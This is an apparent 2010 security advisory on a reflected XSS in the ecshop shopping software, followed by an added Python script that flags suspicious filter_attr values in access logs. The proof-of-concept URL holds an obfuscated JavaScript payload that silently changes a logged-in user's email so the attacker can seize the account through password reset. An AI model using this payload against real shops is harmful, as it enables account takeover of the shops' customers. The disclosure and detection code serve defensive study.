ecshop: modifying any user's password through XSS exploitation

2010-10-04T00:00:00
ID MYHACK58:62201028015
Type myhack58
Reporter Anonymous
Modified 2010-10-04T00:00:00

Description

ecshop currently has a reflected XSS that can be exploited; if secondary development has introduced further XSS or other CSRF problems, there are more ways to use it. (I once ran into this problem and was slightly affected by it.)

Through the XSS, a POST request is constructed that submits a change to the user's personal information. The field changed is the mailbox (e-mail address), after which the password is obtained through password retrieval.

Proof of vulnerability:

http://localhost/test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%2 2%3E%3Cscript%3Eeval%28String. fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%2 9% 2 9%3C/script%3E%3C%2 2

Of course, using the file-inclusion approach is more concise.

Vendor response: the filtering is not strict; it is being repaired.

2010-09-03: A patch has been released. Patch download address: http://bbs.ecshop.com/thread-137475-1-2.html

2010-09-06: URL encoding and decoding applied; unneeded parameters removed.
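
For reviewing web server logs for requests that reach the loosely filtered filter_attr parameter of category.php, the following is an added example, not code from the original advisory or from ecshop. It assumes that legitimate filter_attr values are dot-separated integers (like the "0.0.0.199" prefix in the URL above) and that logs are in combined log format; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumption: legitimate filter_attr values are dot-separated integers,
# like the "0.0.0.199" prefix in the proof-of-concept URL.
VALID_FILTER_ATTR = re.compile(r"\d+(?:\.\d+)*")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded input is also checked."""
    for _ in range(max_rounds):
        if (decoded := unquote(value)) == value:
            break
        value = decoded
    return value

def suspicious_filter_attr(uri):
    """Return the decoded filter_attr if it is not dot-separated integers, else None."""
    parts = urlsplit(uri)
    if not parts.path.endswith("/category.php"):
        return None
    for name, value in parse_qsl(parts.query):  # parse_qsl decodes once
        if name == "filter_attr":
            value = fully_unquote(value)
            if not VALID_FILTER_ATTR.fullmatch(value):
                return value
    return None

def scan(log_lines):
    """Return (line_number, decoded_value) for each flagged access-log line."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        bad = suspicious_filter_attr(m.group(1)) if m else None
        if bad is not None:
            hits.append((n, bad))
    return hits

# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Oct/2010:10:00:00 +0800] "GET /category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [04/Oct/2010:10:00:05 +0800] "GET /category.php?id=3&filter_attr=0.0.0.199%22%3E%3Cb%3E HTTP/1.1" 200 5150',
    '192.0.2.12 - - [04/Oct/2010:10:00:09 +0800] "GET /category.php?id=3&filter_attr=0.0.0.199%2522%253E HTTP/1.1" 200 5150',
    '192.0.2.13 - - [04/Oct/2010:10:00:12 +0800] "GET /goods.php?id=7 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: unexpected filter_attr {value!r}")
```

The same allow-list pattern can be applied server-side to reject the parameter before it is echoed into the page, which is the strict filtering the vendor response says was missing.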